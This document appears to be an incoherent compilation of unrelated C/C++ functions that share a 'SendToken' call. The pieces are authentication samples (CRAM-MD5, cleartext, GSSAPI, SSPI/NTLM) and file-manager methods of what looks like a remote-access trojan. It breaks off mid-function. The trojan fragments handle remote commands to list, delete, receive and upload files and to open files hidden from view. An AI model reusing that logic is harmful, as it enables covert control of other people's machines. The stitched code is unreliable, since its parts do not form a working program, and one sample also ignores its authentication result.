int HandleCRAMMD5( int inSocket )
{
unsigned char pChallenge[255] = { 0, };
char pHostname[128] = { 0, };
char *pResponse = NULL;
char *pUsername = NULL;
struct timeval stCurrentTime;
int iResult = -1;
// we will be using ReadToken and WriteToken to send data back and forth for this
// example, though not necessarily the most efficient, it is simplistic for this
// demonstration.
// Since CRAM-MD5 was requested, let's generate a challenge and send it to the client
// using example method in RFC 1460, page 12.
gethostname( pHostname, 127 );
gettimeofday( &stCurrentTime, NULL ); // assume no error occurred
snprintf( pChallenge, 255, "<%ld.%ld@%s>", (long) getpid(), stCurrentTime.tv_sec, pHostname );
printf( "Sending challenge %s\n", pChallenge );
// send our challenge to the client
if( SendToken(inSocket, pChallenge, strlen(pChallenge)) > 0 ) {
// now wait for username and response to return
if( ReadToken(inSocket, &pUsername) > 0 ) {
if( ReadToken(inSocket, &pResponse) > 0 ) {
// here is where we authenticate the user using Open Directory
iResult = AuthCRAMMD5( pUsername, pChallenge, pResponse );
// send a response
if( iResult == eDSNoErr ) {
SendToken( inSocket, "Accepted", sizeof("Accepted") );
} else {
SendToken( inSocket, "Rejected", sizeof("Rejected") );
}
}
}
}
// free up any strings we allocated
if( pUsername != NULL ) {
free( pUsername );
pUsername = NULL;
}
if( pResponse != NULL ) {
free( pResponse );
pResponse = NULL;
}
return iResult;
}
void CFileManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
switch (lpBuffer[0])
{
case COMMAND_LIST_FILES:// 获取文件列表
SendFilesList((char *)lpBuffer + 1);
break;
case COMMAND_DELETE_FILE:// 删除文件
DeleteFile((char *)lpBuffer + 1);
SendToken(TOKEN_DELETE_FINISH);
break;
case COMMAND_DELETE_DIRECTORY:// 删除文件
////printf("删除目录 %s\n", (char *)(bPacket + 1));
DeleteDirectory((char *)lpBuffer + 1);
SendToken(TOKEN_DELETE_FINISH);
break;
case COMMAND_DOWN_FILES: // 上传文件
UploadToRemote(lpBuffer + 1);
break;
case COMMAND_CONTINUE: // 上传文件
SendFileData(lpBuffer + 1);
break;
case COMMAND_CREATE_FOLDER:
CreateFolder(lpBuffer + 1);
break;
case COMMAND_RENAME_FILE:
Rename(lpBuffer + 1);
break;
case COMMAND_STOP:
StopTransfer();
break;
case COMMAND_SET_TRANSFER_MODE:
SetTransferMode(lpBuffer + 1);
break;
case COMMAND_FILE_SIZE:
CreateLocalRecvFile(lpBuffer + 1);
break;
case COMMAND_FILE_DATA:
WriteLocalRecvFile(lpBuffer + 1, nSize -1);
break;
case COMMAND_OPEN_FILE_SHOW:
OpenFile((char *)lpBuffer + 1, SW_SHOW);
break;
case COMMAND_OPEN_FILE_HIDE:
OpenFile((char *)lpBuffer + 1, SW_HIDE);
break;
default:
break;
}
}
int HandleCleartext( int inSocket )
{
char *pUsername = NULL;
char *pPassword = NULL;
char *pRecordname = NULL;
int iResult = -1;
// we will be using ReadToken and WriteToken to send data back and forth for this
// example, though not necessarily the most efficient, it is simplistic for this
// demonstration.
// we expect 2 tokens, username then password
// read the username from the network stream
if( ReadToken(inSocket, &pUsername) > 0 ) {
// read the password from the network stream
if( ReadToken(inSocket, &pPassword) > 0 ) {
iResult = AuthCleartext( pUsername, pPassword );
// send a response
if( iResult == eDSNoErr ) {
SendToken( inSocket, "Accepted", sizeof("Accepted") );
} else {
SendToken( inSocket, "Rejected", sizeof("Rejected") );
}
}
}
// free any allocated strings
if( pUsername != NULL ) {
free( pUsername );
pUsername = NULL;
}
if( pPassword != NULL ) {
free( pPassword );
pPassword = NULL;
}
if( pRecordname != NULL ) {
free( pRecordname );
pRecordname = NULL;
}
return iResult;
}
void CFileManager::Rename(LPBYTE lpBuffer)
{
LPCTSTR lpExistingFileName = (char *)lpBuffer;
LPCTSTR lpNewFileName = lpExistingFileName + lstrlen(lpExistingFileName) + 1;
::MoveFile(lpExistingFileName, lpNewFileName);
SendToken(TOKEN_RENAME_FINISH);
}
void CFileManager::CreateLocalRecvFile(LPBYTE lpBuffer)
{
FILESIZE *pFileSize = (FILESIZE *)lpBuffer;
// 保存当前正在操作的文件名
memset(m_strCurrentProcessFileName, 0, sizeof(m_strCurrentProcessFileName));
strcpy(m_strCurrentProcessFileName, (char *)lpBuffer + 8);
// 保存文件长度
m_nCurrentProcessFileLength = (pFileSize->dwSizeHigh * (MAXDWORD + 1)) + pFileSize->dwSizeLow;
// 创建多层目录
MakeSureDirectoryPathExists(m_strCurrentProcessFileName);
WIN32_FIND_DATA FindFileData;
HANDLE hFind = FindFirstFile(m_strCurrentProcessFileName, &FindFileData);
if (hFind != INVALID_HANDLE_VALUE
&& m_nTransferMode != TRANSFER_MODE_OVERWRITE_ALL
&& m_nTransferMode != TRANSFER_MODE_ADDITION_ALL
&& m_nTransferMode != TRANSFER_MODE_JUMP_ALL
)
{
SendToken(TOKEN_GET_TRANSFER_MODE);
}
else
{
GetFileData();
}
FindClose(hFind);
}
// 传送下一个文件
void CFileManager::UploadNext()
{
list <string>::iterator it = m_UploadList.begin();
// 删除一个任务
m_UploadList.erase(it);
// 还有上传任务
if(m_UploadList.empty())
{
SendToken(TOKEN_TRANSFER_FINISH);
}
else
{
// 上传下一个
it = m_UploadList.begin();
SendFileSize((*it).c_str());
}
}
static
DWORD
ServerEstablishContext(
IN INT nSocket,
IN CredHandle *pServerCreds,
OUT CtxtHandle *pContext,
IN ULONG AscFlags
)
{
DWORD dwError = ERROR_SUCCESS;
DWORD dwLoopError = ERROR_SUCCESS;
ULONG nRetFlags = 0;
SecBufferDesc InputDesc;
SecBufferDesc OutputDesc;
SecBuffer SendTokenBuffer;
SecBuffer RecvTokenBuffer;
TimeStamp Expiry;
PCtxtHandle pContextHandle = NULL;
INT nContextAcquired = 0;
memset(&InputDesc, 0, sizeof(SecBufferDesc));
memset(&OutputDesc, 0, sizeof(SecBufferDesc));
memset(&SendTokenBuffer, 0, sizeof(SecBuffer));
memset(&RecvTokenBuffer, 0, sizeof(SecBuffer));
memset(&Expiry, 0, sizeof(TimeStamp));
memset(pContext, 0, sizeof(CtxtHandle));
InputDesc.cBuffers = 1;
InputDesc.ulVersion = SECBUFFER_VERSION;
InputDesc.pBuffers = &RecvTokenBuffer;
OutputDesc.cBuffers = 1;
OutputDesc.ulVersion = SECBUFFER_VERSION;
OutputDesc.pBuffers = &SendTokenBuffer;
printf("ASC flags requested (0x%08x):\n", AscFlags);
DumpAscReqFlags(AscFlags);
do
{
dwError = RecvToken(nSocket, &RecvTokenBuffer);
BAIL_ON_ERROR(dwError);
printf("RECEIVED:\n");
DumpBuffer(RecvTokenBuffer.pvBuffer, RecvTokenBuffer.cbBuffer);
DumpNtlmMessage(RecvTokenBuffer.pvBuffer, RecvTokenBuffer.cbBuffer);
printf("\n");
RecvTokenBuffer.BufferType = SECBUFFER_TOKEN;
SendTokenBuffer.cbBuffer = 0;
SendTokenBuffer.pvBuffer = NULL;
SendTokenBuffer.BufferType = SECBUFFER_TOKEN;
// we need to use dwLoopErr in this case because we may get
// back a "continue" command. In those cases, we still
// need dwError to be used and set seperatly based on other
// calls.
dwLoopError = AcceptSecurityContext(
pServerCreds,
pContextHandle,
&InputDesc,
AscFlags,
SECURITY_NATIVE_DREP,
pContext,
&OutputDesc,
&nRetFlags,
&Expiry
);
if (SEC_E_OK != dwLoopError && SEC_I_CONTINUE_NEEDED != dwLoopError)
{
dwError = dwLoopError;
BAIL_ON_ERROR(dwError);
}
if (SEC_I_CONTINUE_NEEDED == dwLoopError)
{
printf("Context partially accepted...\n");
DumpBuffer(SendTokenBuffer.pvBuffer, SendTokenBuffer.cbBuffer);
DumpNtlmMessage(SendTokenBuffer.pvBuffer, SendTokenBuffer.cbBuffer);
if (nRetFlags)
{
printf("ASC flags returned (0x%08x):\n", nRetFlags);
DumpAscRetFlags(nRetFlags);
}
printf("\n");
}
else
{
printf("Context FULLY accepted!\n");
printf("ASC flags returned (0x%08x):\n", nRetFlags);
DumpAscRetFlags(nRetFlags);
printf("\n");
}
nContextAcquired = 1;
pContextHandle = pContext;
free(RecvTokenBuffer.pvBuffer);
RecvTokenBuffer.pvBuffer = NULL;
if (SendTokenBuffer.cbBuffer != 0)
{
dwError = SendToken(nSocket, &SendTokenBuffer);
BAIL_ON_ERROR(dwError);
FreeContextBuffer(SendTokenBuffer.pvBuffer);
SendTokenBuffer.pvBuffer = NULL;
}
} while (dwLoopError == SEC_I_CONTINUE_NEEDED);
finish:
return dwError;
error:
if (RecvTokenBuffer.pvBuffer)
{
free(RecvTokenBuffer.pvBuffer);
RecvTokenBuffer.pvBuffer = NULL;
}
if (SendTokenBuffer.cbBuffer)
{
FreeContextBuffer(SendTokenBuffer.pvBuffer);
SendTokenBuffer.pvBuffer = NULL;
SendTokenBuffer.cbBuffer = 0;
}
if (nContextAcquired)
{
DeleteSecurityContext(pContext);
}
goto finish;
}
static
DWORD
SignServer(
IN INT nSocket,
IN CredHandle *pServerCreds,
IN ULONG AscFlags
)
{
DWORD dwError = ERROR_SUCCESS;
ULONG ulQop = 0;
INT nContextAcquired = 0;
ULONG nIndex = 0;
SecBuffer TransmitBuffer;
SecBuffer MsgBuffer;
SecBuffer WrapBuffers[2] = {0};
SecBufferDesc WrapBufferDesc;
CtxtHandle Context;
SecPkgContext_Names Names;
SecPkgContext_Sizes Sizes;
SecPkgContext_SessionKey SessionKey;
memset(&TransmitBuffer, 0, sizeof(SecBuffer));
memset(&MsgBuffer, 0, sizeof(SecBuffer));
memset(&WrapBufferDesc, 0, sizeof(SecBufferDesc));
memset(&Context, 0, sizeof(CtxtHandle));
memset(&Names, 0, sizeof(SecPkgContext_Names));
memset(&Sizes, 0, sizeof(SecPkgContext_Sizes));
memset(&SessionKey, 0, sizeof(SecPkgContext_SessionKey));
/* Establish a context with the client */
dwError = ServerEstablishContext(
nSocket,
pServerCreds,
&Context,
AscFlags
);
BAIL_ON_ERROR(dwError);
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_NAMES,
&Names
);
if (dwError)
{
printf("Unable to query context: %d\n", dwError);
}
else
{
printf("Context is for user: %s\n", Names.sUserName);
}
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_SESSION_KEY,
&SessionKey
);
if (dwError)
{
printf("Unable to query context: %X\n", dwError);
}
else
{
printf("Session Key: ");
for(nIndex = 0; nIndex < SessionKey.SessionKeyLength; nIndex++)
{
printf("%02X ", SessionKey.SessionKey[nIndex]);
}
printf("\n\n");
}
printf("Server accepted context successfully!\n");
// for clean up... once we've established a context, we must clean it up on
// future failures.
nContextAcquired = 1;
dwError = QueryContextAttributes
(
&Context,
SECPKG_ATTR_SIZES,
&Sizes
);
BAIL_ON_ERROR(dwError);
/* Receive the sealed message token */
dwError = RecvToken(nSocket, &TransmitBuffer);
BAIL_ON_ERROR(dwError);
printf("RECEIVED:\n");
DumpBuffer(TransmitBuffer.pvBuffer, TransmitBuffer.cbBuffer);
printf("\n");
WrapBufferDesc.cBuffers = 2;
WrapBufferDesc.pBuffers = WrapBuffers;
WrapBufferDesc.ulVersion = SECBUFFER_VERSION;
WrapBuffers[0].BufferType = SECBUFFER_TOKEN;
WrapBuffers[0].pvBuffer = TransmitBuffer.pvBuffer;
WrapBuffers[0].cbBuffer = Sizes.cbMaxSignature;
WrapBuffers[1].BufferType = SECBUFFER_DATA;
WrapBuffers[1].cbBuffer = TransmitBuffer.cbBuffer - Sizes.cbMaxSignature;
WrapBuffers[1].pvBuffer = (PBYTE)TransmitBuffer.pvBuffer + Sizes.cbMaxSignature;
dwError = DecryptMessage(
&Context,
&WrapBufferDesc,
0, // no sequence number
&ulQop
);
if (dwError)
{
// When we bail, this var will try to be freed which is a bad thing...
// the memory will be freed when TransmitBuffer is freed, so it's ok
// to set this buffer to NULL here.
WrapBuffers[1].pvBuffer = NULL;
printf("Unable to decrypt message\n");
}
BAIL_ON_ERROR(dwError);
MsgBuffer = WrapBuffers[1];
printf("Received message '%.*s' from client\n", MsgBuffer.cbBuffer, MsgBuffer.pvBuffer);
/* Produce a signature block for the message */
WrapBuffers[0] = MsgBuffer;
WrapBuffers[1].BufferType = SECBUFFER_TOKEN;
WrapBuffers[1].cbBuffer = Sizes.cbMaxSignature;
WrapBuffers[1].pvBuffer = malloc(Sizes.cbMaxSignature);
if (WrapBuffers[1].pvBuffer == NULL)
{
dwError = ERROR_NOT_ENOUGH_MEMORY;
BAIL_ON_ERROR(dwError);
}
dwError = MakeSignature(
&Context,
0,
&WrapBufferDesc,
0
);
if (dwError)
{
printf("Unable to MakeSignature");
}
BAIL_ON_ERROR(dwError);
free(TransmitBuffer.pvBuffer);
TransmitBuffer = WrapBuffers[1];
WrapBuffers[1].pvBuffer = NULL;
WrapBuffers[1].cbBuffer = 0;
/* Send the signature block to the client */
dwError = SendToken(nSocket, &TransmitBuffer);
BAIL_ON_ERROR(dwError);
free(TransmitBuffer.pvBuffer);
TransmitBuffer.pvBuffer = NULL;
TransmitBuffer.cbBuffer = 0;
/* Delete context */
dwError = DeleteSecurityContext( &Context );
BAIL_ON_ERROR(dwError);
finish:
return dwError;
error:
if (Names.sUserName)
{
FreeContextBuffer(Names.sUserName);
}
if (TransmitBuffer.pvBuffer)
{
free(TransmitBuffer.pvBuffer);
TransmitBuffer.pvBuffer = NULL;
TransmitBuffer.cbBuffer = 0;
}
if (WrapBuffers[1].pvBuffer)
{
free(WrapBuffers[1].pvBuffer);
WrapBuffers[1].pvBuffer = NULL;
WrapBuffers[1].cbBuffer = 0;
}
if (nContextAcquired)
{
DeleteSecurityContext(&Context);
}
goto finish;
}
void CFileManager::CreateFolder(LPBYTE lpBuffer)
{
MakeSureDirectoryPathExists((char *)lpBuffer);
SendToken(TOKEN_CREATEFOLDER_FINISH);
}
void CFileManager::StopTransfer()
{
if (!m_UploadList.empty())
m_UploadList.clear();
SendToken(TOKEN_TRANSFER_FINISH);
}
int AuthGSSAPI( int inSocket )
{
char *pRecvToken = NULL;
int iRecvTokenLen = 0;
char *pSendToken = NULL;
int iSendTokenLen = 0;
char *pUserPrinc = NULL;
char *pServiceName = NULL;
gss_ctx_id_t gssContext = GSS_C_NO_CONTEXT;
gss_cred_id_t gssCreds = GSS_C_NO_CREDENTIAL;
OM_uint32 iResult = GSS_S_DEFECTIVE_CREDENTIAL;
OM_uint32 iMinorStatus;
// Key steps to authenticating a user with GSSAPI:
//
// GSSAPI is a request-response loop until finished. For every token received
// there may is a token sent back. This loop is done until an error occurs or
// we recieve a GSS_S_COMPLETE. All tokens generated must be sent back to
// complete the process.
// After successfully verifying the GSSAPI succeeded, we need to also verify
// the user is a valid user on the system. GSSAPI validates the user's credentials
// not whether or not the user is allowed on this system.
do {
// read token data from the socket
iRecvTokenLen = ReadToken( inSocket, &pRecvToken );
printf( "Received a token with length of %d\n", iRecvTokenLen );
if( iRecvTokenLen > 0 ) {
// let's read and write data sending to and from the GSSauthenticate
iResult = AuthenticateGSS( pRecvToken, iRecvTokenLen, &pSendToken, &iSendTokenLen,
&pServiceName, &pUserPrinc, &gssContext, &gssCreds );
}
// if we have a token to send, let's send it to the client
if( iSendTokenLen != 0 ) {
printf( "Sending a token length of %d\n", iSendTokenLen );
int iSent = SendToken(inSocket, pSendToken, iSendTokenLen);
if( iSent == -1 || iSent != iSendTokenLen ) {
// we had a problem, set failure state
printf( "Failed to send packet.. bailing\n" );
iResult = GSS_S_FAILURE;
}
}
// free up our token if we have one
if( pRecvToken != NULL ) {
free( pRecvToken );
pRecvToken = NULL;
}
// free up our send token if we have one
if( pSendToken != NULL ) {
free( pSendToken );
pSendToken = NULL;
}
} while( iResult == GSS_S_CONTINUE_NEEDED );
printf( "\n" ); // just print a line feed for visuals
// if we completed successfully print out the userPrincipal if we had one
if( iResult == GSS_S_COMPLETE && pUserPrinc != NULL && pServiceName != NULL ) {
char *pRecordName;
printf( "Success: Valid credentials provided by '%s' service '%s'\n", pUserPrinc, pServiceName );
// here you would compare the service to ensure it was the service you expected
// if( strcasecmp( pServiceName, #expected service#) == 0 ) {
//
// }
if( pRecordName = FindUserFromPrincipal( pUserPrinc ) ) {
printf( "Success: Found a user record for user - %s\n", pRecordName );
// send a response
SendToken( inSocket, "Accepted", sizeof("Accepted") );
// need to free pRecordName cause it is returned
free( pRecordName );
pRecordName = NULL;
} else {
// send response
SendToken( inSocket, "Rejected", sizeof("Rejected") );
printf( "Failure: No matching user record found for user\n" );
}
} else {
if( pUserPrinc != NULL ) {
printf( "Error: Unable to authenticate user %s\n", pUserPrinc );
}
if( pServiceName != NULL ) {
printf( "Error: Unable to verify service %s\n", pServiceName );
}
}
// clean up any context
if( gssContext != GSS_C_NO_CONTEXT ) {
gss_delete_sec_context( &iMinorStatus, gssContext, GSS_C_NO_BUFFER );
gssContext = GSS_C_NO_CONTEXT;
}
// clean up any credentials
if( gssCreds != GSS_C_NO_CREDENTIAL ) {
gss_release_cred( &iMinorStatus, &gssCreds );
gssCreds = GSS_C_NO_CREDENTIAL;
}
return 0;
}
static
DWORD
ClientEstablishContext(
IN PCSTR pSPN,
IN INT nSocket,
IN PCSTR pServiceName,
IN PCSTR pServicePassword,
IN PCSTR pServiceRealm,
IN ULONG DelegFlag,
OUT CtxtHandle *pSspiContext,
IN PCSTR pSecPkgName,
OUT ULONG *pRetFlags
)
{
DWORD dwError = ERROR_SUCCESS;
DWORD dwLoopError = ERROR_SUCCESS;
PCtxtHandle pContextHandle = NULL;
INT nCredentialsAcquired = 0;
INT nContextAcquired = 0;
SecBuffer SendTokenBuffer;
SecBuffer RecvTokenBuffer;
SecBufferDesc InputDesc;
SecBufferDesc OutputDesc;
CredHandle CredHandle;
TimeStamp Expiry;
SEC_WINNT_AUTH_IDENTITY AuthIdentity;
PSEC_WINNT_AUTH_IDENTITY pAuthId = NULL;
memset(&SendTokenBuffer, 0, sizeof(SecBuffer));
memset(&RecvTokenBuffer, 0, sizeof(SecBuffer));
memset(&InputDesc, 0, sizeof(SecBufferDesc));
memset(&OutputDesc, 0, sizeof(SecBufferDesc));
memset(&CredHandle, 0, sizeof(CredHandle));
memset(&Expiry, 0, sizeof(TimeStamp));
memset(&AuthIdentity, 0, sizeof(AuthIdentity));
memset(pSspiContext, 0, sizeof(CtxtHandle));
*pRetFlags = 0;
InputDesc.cBuffers = 1;
InputDesc.pBuffers = &RecvTokenBuffer;
InputDesc.ulVersion = SECBUFFER_VERSION;
RecvTokenBuffer.BufferType = SECBUFFER_TOKEN;
RecvTokenBuffer.cbBuffer = 0;
RecvTokenBuffer.pvBuffer = NULL;
OutputDesc.cBuffers = 1;
OutputDesc.pBuffers = &SendTokenBuffer;
OutputDesc.ulVersion = SECBUFFER_VERSION;
SendTokenBuffer.BufferType = SECBUFFER_TOKEN;
SendTokenBuffer.cbBuffer = 0;
SendTokenBuffer.pvBuffer = NULL;
CredHandle.dwLower = 0;
CredHandle.dwUpper = 0;
if (pServiceName)
{
AuthIdentity.User = (PBYTE) pServiceName;
AuthIdentity.UserLength = (DWORD)strlen(pServiceName);
pAuthId = &AuthIdentity;
}
if (pServicePassword)
{
AuthIdentity.Password = (PBYTE) pServicePassword;
AuthIdentity.PasswordLength = (DWORD)strlen(pServicePassword);
pAuthId = &AuthIdentity;
}
if (pServiceRealm)
{
AuthIdentity.Domain = (PBYTE) pServiceRealm;
AuthIdentity.DomainLength = (DWORD)strlen(pServiceRealm);
pAuthId = &AuthIdentity;
}
AuthIdentity.Flags = SEC_WINNT_AUTH_IDENTITY_ANSI;
dwError = AcquireCredentialsHandle(
NULL, // no principal name
(PSTR) pSecPkgName, // package name
SECPKG_CRED_OUTBOUND,
NULL, // no logon id
pAuthId,
NULL, // no get key fn
NULL, // noget key arg
&CredHandle,
&Expiry
);
BAIL_ON_ERROR(dwError);
nCredentialsAcquired = 1;
/*
* Perform the context-establishement loop.
*/
pSspiContext->dwLower = 0;
pSspiContext->dwUpper = 0;
do
{
// we need to use dwLoopErr in this case because we may get
// back a "continue" command. In those cases, we still
// need dwError to be used and set seperatly based on other
// calls.
dwLoopError =
InitializeSecurityContext(
&CredHandle,
pContextHandle,
(PSTR) pSPN,
DelegFlag,
0, // reserved
SECURITY_NATIVE_DREP,
&InputDesc,
0, // reserved
pSspiContext,
&OutputDesc,
pRetFlags,
&Expiry
);
if (SEC_E_OK != dwLoopError && SEC_I_CONTINUE_NEEDED != dwLoopError)
{
dwError = dwLoopError;
BAIL_ON_ERROR(dwError);
}
nContextAcquired = 1;
if (SEC_I_CONTINUE_NEEDED == dwLoopError)
{
PNTLM_NEGOTIATE_MESSAGE pMsg = (PNTLM_NEGOTIATE_MESSAGE) SendTokenBuffer.pvBuffer;
// Adjust any flags for debugging
// pMsg->NtlmFlags |= NTLM_FLAG_SEAL;
printf("Context partially initialized...\n");
DumpBuffer(SendTokenBuffer.pvBuffer, SendTokenBuffer.cbBuffer);
DumpNtlmMessage(SendTokenBuffer.pvBuffer, SendTokenBuffer.cbBuffer);
printf("\n");
printf("Flags returned:\n");
DumpIscRetFlags(*pRetFlags);
printf("\n");
}
else
{
PNTLM_RESPONSE_MESSAGE pMsg = (PNTLM_RESPONSE_MESSAGE) SendTokenBuffer.pvBuffer;
// Adjust any flags for debugging
//pMsg->NtlmFlags |= NTLM_FLAG_SEAL;
printf("Context FULLY initialized!\n");
DumpBuffer(SendTokenBuffer.pvBuffer, SendTokenBuffer.cbBuffer);
DumpNtlmMessage(SendTokenBuffer.pvBuffer, SendTokenBuffer.cbBuffer);
printf("\n");
printf("Flags returned:\n");
DumpIscRetFlags(*pRetFlags);
printf("\n");
}
pContextHandle = pSspiContext;
if (RecvTokenBuffer.pvBuffer)
{
free(RecvTokenBuffer.pvBuffer);
RecvTokenBuffer.pvBuffer = NULL;
RecvTokenBuffer.cbBuffer = 0;
}
if (SendTokenBuffer.cbBuffer != 0)
{
dwError = SendToken(nSocket, &SendTokenBuffer);
BAIL_ON_ERROR(dwError);
}
FreeContextBuffer(SendTokenBuffer.pvBuffer);
SendTokenBuffer.pvBuffer = NULL;
SendTokenBuffer.cbBuffer = 0;
if (SEC_I_CONTINUE_NEEDED == dwLoopError)
{
dwError = RecvToken(nSocket, &RecvTokenBuffer);
BAIL_ON_ERROR(dwError);
printf("RECEIVED:\n");
DumpBuffer(RecvTokenBuffer.pvBuffer, RecvTokenBuffer.cbBuffer);
DumpNtlmMessage(RecvTokenBuffer.pvBuffer, RecvTokenBuffer.cbBuffer);
printf("\n");
}
} while (dwLoopError == SEC_I_CONTINUE_NEEDED);
FreeCredentialsHandle(&CredHandle);
finish:
return dwError;
error:
if (nCredentialsAcquired)
{
FreeCredentialsHandle(&CredHandle);
}
if (nContextAcquired)
{
DeleteSecurityContext(pSspiContext);
memset(pSspiContext, 0, sizeof(CtxtHandle));
}
if (RecvTokenBuffer.pvBuffer)
{
free(RecvTokenBuffer.pvBuffer);
}
if (SendTokenBuffer.cbBuffer)
{
FreeContextBuffer(SendTokenBuffer.pvBuffer);
}
goto finish;
}
static
DWORD
CallServer(
IN PCSTR pHost,
IN USHORT usPort,
IN PCSTR pSPN,
IN PCSTR pServiceName,
IN PCSTR pServicePassword,
IN PCSTR pServiceRealm,
IN ULONG DelegFlag,
IN PCSTR pMsg,
IN PCSTR pSecPkgName,
IN INT nSignOnly
)
{
DWORD dwError = ERROR_SUCCESS;
SecBuffer WrapBuffers[3] = {0};
INT nSocket = INVALID_SOCKET;
ULONG nIndex = 0;
ULONG RetFlags = 0;
ULONG QopState = 0;
INT nContextAcquired = 0;
CtxtHandle Context;
SecBuffer InBuffer;
SecBuffer OutBuffer;
SecBufferDesc InBufferDesc;
SecPkgContext_Sizes Sizes;
SecPkgContext_Names Names;
#if 0
SecPkgContext_AccessToken Token;
SecPkgContext_NativeNames NativeNames;
HANDLE TokenHandle;
SecPkgContext_Authority Authority;
TOKEN_USER User;
DWORD NeedLength = 0;
#endif
SecPkgContext_TargetInformation Target;
SecPkgContext_SessionKey SessionKey;
memset(&Context, 0, sizeof(CtxtHandle));
memset(&InBuffer, 0, sizeof(SecBuffer));
memset(&OutBuffer, 0, sizeof(SecBuffer));
memset(&InBufferDesc, 0, sizeof(SecBufferDesc));
memset(&Sizes, 0, sizeof(SecPkgContext_Sizes));
/* Open connection */
dwError = ConnectToServer(pHost, usPort, &nSocket);
BAIL_ON_ERROR(dwError);
/* Establish context */
dwError = ClientEstablishContext(
pSPN,
nSocket,
pServiceName,
pServicePassword,
pServiceRealm,
DelegFlag,
&Context,
pSecPkgName,
&RetFlags
);
BAIL_ON_ERROR(dwError);
nContextAcquired = 1;
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_NAMES,
&Names);
BAIL_ON_ERROR(dwError);
printf("Context is for user: %s\n", Names.sUserName);
#if 0
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_ACCESS_TOKEN,
&Token);
BAIL_ON_ERROR(dwError);
dwError = GetTokenInformation(
&Context,
TokenUser,
&User,
sizeof(User),
&NeedLength);
BAIL_ON_ERROR(dwError);
dwError = QuerySecurityContextToken(
&Context,
&TokenHandle);
BAIL_ON_ERROR(dwError);
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_AUTHORITY,
&Authority);
BAIL_ON_ERROR(dwError);
printf("Authority is %s\n", Authority.sAuthorityName);
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_NATIVE_NAMES,
&NativeNames);
BAIL_ON_ERROR(dwError);
#endif
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_TARGET_INFORMATION,
&Target);
if (dwError == SEC_E_UNSUPPORTED_FUNCTION)
{
printf("Querying server is unsupported\n");
}
else
{
BAIL_ON_ERROR(dwError);
printf("Context is for server %s\n", Target.MarshalledTargetInfo);
}
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_SESSION_KEY,
&SessionKey);
if(!dwError)
{
printf("Session Key: ");
for(nIndex = 0; nIndex < SessionKey.SessionKeyLength; nIndex++)
{
printf("%02X ", SessionKey.SessionKey[nIndex]);
}
printf("\n");
}
dwError = QueryContextAttributes(
&Context,
SECPKG_ATTR_SIZES,
&Sizes
);
BAIL_ON_ERROR(dwError);
/* Seal the message */
InBuffer.pvBuffer = (PVOID) pMsg;
InBuffer.cbBuffer = (ULONG)strlen(pMsg) + 1;
//
// Prepare to encrypt the message
//
InBufferDesc.cBuffers = 3;
InBufferDesc.pBuffers = WrapBuffers;
InBufferDesc.ulVersion = SECBUFFER_VERSION;
WrapBuffers[0].cbBuffer = Sizes.cbSecurityTrailer;
WrapBuffers[0].BufferType = SECBUFFER_TOKEN;
WrapBuffers[0].pvBuffer = malloc(Sizes.cbSecurityTrailer);
if (WrapBuffers[0].pvBuffer == NULL)
{
dwError = ERROR_NOT_ENOUGH_MEMORY;
BAIL_ON_ERROR(dwError);
}
WrapBuffers[1].BufferType = SECBUFFER_DATA;
WrapBuffers[1].cbBuffer = InBuffer.cbBuffer;
WrapBuffers[1].pvBuffer = malloc(WrapBuffers[1].cbBuffer);
if (WrapBuffers[1].pvBuffer == NULL)
{
dwError = ERROR_NOT_ENOUGH_MEMORY;
BAIL_ON_ERROR(dwError);
}
memcpy(
WrapBuffers[1].pvBuffer,
InBuffer.pvBuffer,
InBuffer.cbBuffer
);
WrapBuffers[2].BufferType = SECBUFFER_PADDING;
WrapBuffers[2].cbBuffer = Sizes.cbBlockSize;
WrapBuffers[2].pvBuffer = malloc(WrapBuffers[2].cbBuffer);
if (WrapBuffers[2].pvBuffer == NULL)
{
dwError = ERROR_NOT_ENOUGH_MEMORY;
BAIL_ON_ERROR(dwError);
}
if (nSignOnly)
{
printf("Signing only (not encrypting)\n");
}
dwError = EncryptMessage(
&Context,
nSignOnly ? SECQOP_WRAP_NO_ENCRYPT : 0,
&InBufferDesc,
0);
BAIL_ON_ERROR(dwError);
//
// Create the mesage to send to server
//
OutBuffer.cbBuffer = WrapBuffers[0].cbBuffer + WrapBuffers[1].cbBuffer + WrapBuffers[2].cbBuffer;
OutBuffer.pvBuffer = malloc(OutBuffer.cbBuffer);
if (OutBuffer.pvBuffer == NULL)
{
dwError = ERROR_NOT_ENOUGH_MEMORY;
BAIL_ON_ERROR(dwError);
}
memcpy(
OutBuffer.pvBuffer,
WrapBuffers[0].pvBuffer,
WrapBuffers[0].cbBuffer
);
memcpy(
(PUCHAR) OutBuffer.pvBuffer + (int) WrapBuffers[0].cbBuffer,
WrapBuffers[1].pvBuffer,
WrapBuffers[1].cbBuffer
);
memcpy(
(PUCHAR) OutBuffer.pvBuffer + WrapBuffers[0].cbBuffer + WrapBuffers[1].cbBuffer,
WrapBuffers[2].pvBuffer,
WrapBuffers[2].cbBuffer
);
/* Send to server */
dwError = SendToken(nSocket, &OutBuffer);
BAIL_ON_ERROR(dwError);
printf("Encrypted and sent '%s' to server\n", pMsg);
free(OutBuffer.pvBuffer);
OutBuffer.pvBuffer = NULL;
OutBuffer.cbBuffer = 0;
free(WrapBuffers[0].pvBuffer);
WrapBuffers[0].pvBuffer = NULL;
free(WrapBuffers[1].pvBuffer);
WrapBuffers[1].pvBuffer = NULL;
/* Read signature block into OutBuffer */
dwError = RecvToken(nSocket, &OutBuffer);
BAIL_ON_ERROR(dwError);
/* Verify signature block */
InBufferDesc.cBuffers = 2;
WrapBuffers[0] = InBuffer;
WrapBuffers[0].BufferType = SECBUFFER_DATA;
WrapBuffers[1] = OutBuffer;
WrapBuffers[1].BufferType = SECBUFFER_TOKEN;
dwError = VerifySignature(&Context, &InBufferDesc, 0, &QopState);
BAIL_ON_ERROR(dwError);
free(OutBuffer.pvBuffer);
OutBuffer.pvBuffer = NULL;
/* Delete context */
dwError = DeleteSecurityContext(&Context);
BAIL_ON_ERROR(dwError);
closesocket(nSocket);
finish:
return dwError;
error:
if (nContextAcquired)
{
DeleteSecurityContext(&Context);
}
